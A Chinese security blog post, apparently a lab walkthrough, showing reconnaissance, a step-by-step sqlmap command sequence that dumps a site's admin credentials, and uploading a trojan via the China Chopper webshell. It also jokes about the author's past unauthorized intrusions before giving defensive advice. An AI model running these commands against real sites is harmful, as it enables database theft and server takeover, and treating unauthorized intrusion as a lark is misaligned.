百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

你,真的安全吗?

bigegpt 2024-09-18 07:53 4 浏览

其实啊,你的网络这么差劲!

(备注:大神如果想喷请通过私人微信,可接受冲击波攻击)

仅使用本地测试,非网络攻击行为。

本文关键字:安全,网络,kali,sqlmap

出自公众号:工程师江湖

入侵你的网站,与你何干,仅仅只是好玩罢了!

(改编自—刘慈欣语录)

仔细听.........有人潜伏在你的背后!

一、简单聊聊?

你是不是想问,我有必要关注安全吗?

你不关注,那某些人就很开心了!

你们的数据我随便跑,简单到什么地步呢?

一套kali工具就可以让你 欲仙欲死,抱歉,说错了,是,让你 痛不欲生!(不小心就给你网站玩死了,你的业务呵呵哒。。。)

这种情况很有可能只是菜鸟很平常的行为,高级点的很少会玩坏你的网站,他只会获取你网站的权限,进而拿下你的这台服务器,再牛逼的,通过这台服务器辐射到你的内网,后果自己想去。

什么,你说你不信?等着,给你简单说说——到底怎么个简单法!

谷歌浏览器,利用关键字就可以搜索到一片存在注入漏洞的网站,如果你的网站很不幸被检索到,那么.......

针对这个网站搜集信息,手段么,kali自带的n多小工具,插播一句,

kali,你值得拥有!

nmap扫描啊,我擦,这么多开放端口;

whatweb,我擦,服务器的类型是这样子的啊,网站是这种的啊,语言是这种啊(脑袋里面转过一圈针对这种类型的攻破技巧)。。

作为小菜鸡的我居然感到无聊了.......这么简单!!!!

我对着网站一顿点点点,通过简单的手工测试找到貌似可执行的注入点,然后sqlmap一顿搞,ok你的管理员账号/密码到手,抱歉说错了,是你的数据库到手,里面的信息,哇....好多啊,神奇的是居然管理员的QQ号都有。。。

“你又不知道我的后台页面”,这个真的是不要太简单啊!

一个类似御剑扫描小软件就可以简简单单把你的后台跑出来,唯一复杂的操作就是需要复制,粘贴你的域名。

好了,现在使用账号密码填入你的后台页面,真是一览无遗。

ok,现在终于提起点精神了,想办法上传带有木马的图片等,再拿我可爱的菜刀软件,咔的连接上去,这种感觉.......

都说光说不练假把式。那好,我本地搭建环境走一遍。

(公网是万万不会的,请默念三遍 小编是菜鸡,是鸡菜,菜鸡.....)

走一遍

1.配置环境

(1)准备说明

phpstudy+带有漏洞的网站+kali工具一套+跑后台软件

(2)网站账户名密码简单设置(证明后期操作结果)

admin/admin

(3)网站架设成功

2.开始搞

(1)搜集信息

端口信息

服务器信息

后台信息

(2)注入点查找

野蛮点击,看见id进行1=1和1=2测试,不一致直接扔到kali,利用命令sqlmap -u test.com --dbs 读数据库,结果当然失败,因为那个链接不存在注入,继续找,想了想,还是上工具吧。

(3)直接扔到sqlmap进行跑

这里进行个总体说明。

// 说明:这里写相关的sqlmap命令行入侵等内容(1)使用sqlmap注入检查命令进行验证sqlmap -u "http://www.test.com/?r=content&cid=15" (2)获取当前数据库名称

sqlmap -u http://www.test.com/?r=content&cid=15 –-current-db(3)获取当前数据库用户

sqlmap -u http://www.test.com/?r=content&cid=15 --current-user(4)获取数据库所有表

sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms --tables(5)查看表中的字段

sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms -T manage -- column(6)导出字段的值

sqlmap -u -D "seacms" -T manage -C user,password --dump(7)最后将密文解密,就得到了管理员密码

具体内容截图

得到数据库名称

数据库所有表

经过脚指头分析,manager表里面很大可能有管理员账户和密码,接下来我们跑它。

看见没有,这几个字段里面必定有信息,接下来只跑user和password字段值。

现在账户密码有了,再把密文解密下。

可以登录后台并且上传木马了。。。。

菜刀来一把——

来看看权限,不得不说一句,菜刀牛皮.......

二、怎么样会变安全?

洗洗睡吧!其实怎么样都是不安全的,只能一定程度上变得安全,刷掉一批初级菜鸟,对于牛逼的高手来说,无非是从几分钟攻破变为几天,几周而已。。。!

心里是不是MMP。。。

放心啦!情况没有这么糟糕的。

你相不相信我说的这句话,我不知道,我知道,我说这句话是用来安慰你的。

不过有句话我是认真的,一定程度上确实可以变得安全。

给你上个网络拓扑图(画了我半天)

看见没有,防火墙,IPS,漏扫等这些,看见的麻烦问下自己,自己有这些防护吗?

回答1:有。ok,你可以放点心了,对,就是放点心,你这个防护,已经可以阻拦掉一大批走在安全道路上的小菜鸟了。

回答2:没有。那我只能说句,你们家已经成为后花园了,我闲着没事逛逛,我无聊时候逛逛,我心情不好,给你网站传个东西。(某天你访问网站就会抓狂)

这还算好的了,网站还是可以运行,但是,遇到下手要是没有分寸的,你的网站就挂掉了。

问:你在吓我吧?

我绝不会告诉你,当我是菜鸡的时候就是这样搞的。(不要误会,现在依然是菜鸡,不过那种行为N年没做了,未经授权,即为非法)

当时真的是抱着无所谓的心态玩的。

后来,他家的网站关闭,再后来进不去了,也算提醒了他们。(暗暗自喜)

三、我要绝对的安全

别幼稚了,哪里有绝对的安全!

网站代码总会存在漏洞的。

硬件设备总会产生这样或者那样的问题。

管理人员总会因为意识不到位,导致产生安全事件。

你只能退而求其次,一定限度的去保障自己网络的安全,从而保护自己的资产安全。

怎么个限度法?

1、增加安全设备(我直说了,你花钱把)

安全厂商有哪些呢?

列举些:天融信,启明星辰,山石网科,深信服等......

2、设备,系统入手

你说什么?还要安全意识。

设备???系统???

没错,等我喝口水慢慢说。

曾经为企业上门,看到了很搞笑的一种状况,电脑屏幕上面贴着账户和密码,当时惊为天人,但是我不说!

曾经为企业上门调试设备,又看到了搞笑的一种状况,数通等设备的登录名和密码是厂家默认的,基本的设备防护功能也没有开启,类似dhcp snooping这种,当时感叹人生,但是我不说!

曾经也是调试过系统,还是那句话,很搞笑,系统的一些基本防护措施依然没有,又是一阵感慨,但是我还是不说!

(抱歉,上面三句是为了凑个押韵强行写的。)

然而,为了写这篇文章,我一定要说两句。

“兄弟姐妹们,上点心吧!”

可以从简单的做起,网络结构要注意进行分层次,管理网络一套,业务网络一套。

网络里面应该部署的安全防护设备,请,不要吝啬!

因为今天你的省钱行为会导致后期的数据损失。(如果钱比你企业的数据重要,那么当我没说)

设备,系统等密码一定要数字,大小写交替,长度一定要够,另外的密码需要加密,否则内网环境下。一个ettercap等类似工具就可以抓取到你的传输密码信息。

类似系统防护一定要在配置文件里面顺手做了,参考这篇:Linux安全配置规范(https://mp.weixin.qq.com/s/BSdVm08YgWxh5BDUv7LXxw)

其余的具体防护,本篇不在多说,下篇再会。(备注:看心情更新,关注人不多就懒得写了)

你是不是想说,看起来好麻烦啊!

也有解决办法的,找专门的安全服务公司进行评估,最后出一个完整的防护方案。

题外话:(为了收集素材,捡起了很久没用的渗透知识,然后结合网络简单的写了一篇,欢迎与我沟通,交流你的想法!)

备注:每邀请本行业5人入群,可免费获取已经部署好的渗透环境进行学习。

最后

依然是有任何问题,欢迎入群交流。(转载请获取授权!)

相关推荐

方差分析简介(方差分析通俗理解)

介绍方差分析(ANOVA,AnalysisofVariance)是一种广泛使用的统计方法,用于比较两个或多个组之间的均值。单因素方差分析是方差分析的一种变体,旨在检测三个或更多分类组的均值是否存在...

正如404页面所预示,猴子正成为断网元凶--吧嗒吧嗒真好吃

吧嗒吧嗒,绘图:MakiNaro你可以通过加热、冰冻、水淹、模塑、甚至压溃压力来使网络光缆硬化。但用猴子显然是不行的。光缆那新挤压成型的塑料外皮太尼玛诱人了,无法阻挡一场试吃盛宴的举行。印度政府正...

Python数据可视化:箱线图多种库画法

概念箱线图通过数据的四分位数来展示数据的分布情况。例如:数据的中心位置,数据间的离散程度,是否有异常值等。把数据从小到大进行排列并等分成四份,第一分位数(Q1),第二分位数(Q2)和第三分位数(Q3)...

多组独立(完全随机设计)样本秩和检验的SPSS操作教程及结果解读

作者/风仕在上一期,我们已经讲完了两组独立样本秩和检验的SPSS操作教程及结果解读,这期开始讲多组独立样本秩和检验,我们主要从多组独立样本秩和检验介绍、两组独立样本秩和检验使用条件及案例的SPSS操作...

方差分析 in R语言 and Excel(方差分析r语言例题)

今天来写一篇实际中比较实用的分析方法,方差分析。通过方差分析,我们可以确定组别之间的差异是否超出了由于随机因素引起的差异范围。方差分析分为单因素方差分析和多因素方差分析,这一篇先介绍一下单因素方差分析...

可视化:前端数据可视化插件大盘点 图表/图谱/地图/关系图

前端数据可视化插件大盘点图表/图谱/地图/关系图全有在大数据时代,很多时候我们需要在网页中显示数据统计报表,从而能很直观地了解数据的走向,开发人员很多时候需要使用图表来表现一些数据。随着Web技术的...

matplotlib 必知的 15 个图(matplotlib各种图)

施工专题,我已完成20篇,施工系列几乎覆盖Python完整技术栈,目标只总结实践中最实用的东西,直击问题本质,快速帮助读者们入门和进阶:1我的施工计划2数字专题3字符串专题4列表专题5流程控制专题6编...

R ggplot2常用图表绘制指南(ggplot2绘制折线图)

ggplot2是R语言中强大的数据可视化包,基于“图形语法”(GrammarofGraphics),通过分层方式构建图表。以下是常用图表命令的详细指南,涵盖基本语法、常见图表类型及示例,适合...

Python数据可视化:从Pandas基础到Seaborn高级应用

数据可视化是数据分析中不可或缺的一环,它能帮助我们直观理解数据模式和趋势。本文将全面介绍Python中最常用的三种可视化方法。Pandas内置绘图功能Pandas基于Matplotlib提供了简洁的绘...

Python 数据可视化常用命令备忘录

本文提供了一个全面的Python数据可视化备忘单,适用于探索性数据分析(EDA)。该备忘单涵盖了单变量分析、双变量分析、多变量分析、时间序列分析、文本数据分析、可视化定制以及保存与显示等内容。所...

统计图的种类(统计图的种类及特点图片)

统计图是利用几何图形或具体事物的形象和地图等形式来表现社会经济现象数量特征和数量关系的图形。以下是几种常见的统计图类型及其适用场景:1.条形图(BarChart)条形图是用矩形条的高度或长度来表示...

实测,大模型谁更懂数据可视化?(数据可视化和可视化分析的主要模型)

大家好,我是Ai学习的老章看论文时,经常看到漂亮的图表,很多不知道是用什么工具绘制的,或者很想复刻类似图表。实测,大模型LaTeX公式识别,出乎预料前文,我用Kimi、Qwen-3-235B...

通过AI提示词让Deepseek快速生成各种类型的图表制作

在数据分析和可视化领域,图表是传达信息的重要工具。然而,传统图表制作往往需要专业的软件和一定的技术知识。本文将介绍如何通过AI提示词,利用Deepseek快速生成各种类型的图表,包括柱状图、折线图、饼...

数据可视化:解析箱线图(box plot)

箱线图/盒须图(boxplot)是数据分布的图形表示,由五个摘要组成:最小值、第一四分位数(25th百分位数)、中位数、第三四分位数(75th百分位数)和最大值。箱子代表四分位距(IQR)。IQR是...

[seaborn] seaborn学习笔记1-箱形图Boxplot

1箱形图Boxplot(代码下载)Boxplot可能是最常见的图形类型之一。它能够很好表示数据中的分布规律。箱型图方框的末尾显示了上下四分位数。极线显示最高和最低值,不包括异常值。seaborn中...